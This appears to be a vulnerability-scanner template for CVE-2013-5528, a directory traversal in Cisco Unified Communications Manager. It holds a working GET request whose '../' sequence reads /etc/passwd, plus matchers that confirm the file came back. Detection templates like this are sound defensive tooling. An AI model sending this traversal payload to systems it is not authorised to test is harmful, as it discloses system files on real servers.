id: CVE-2013-5528 info: name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal author: daffainfo severity: high description: Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 reference: https://www.exploit-db.com/exploits/40887 tags: cve,cve2013,lfi,cisco requests: - method: GET path: - "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0" - type: status status: - 200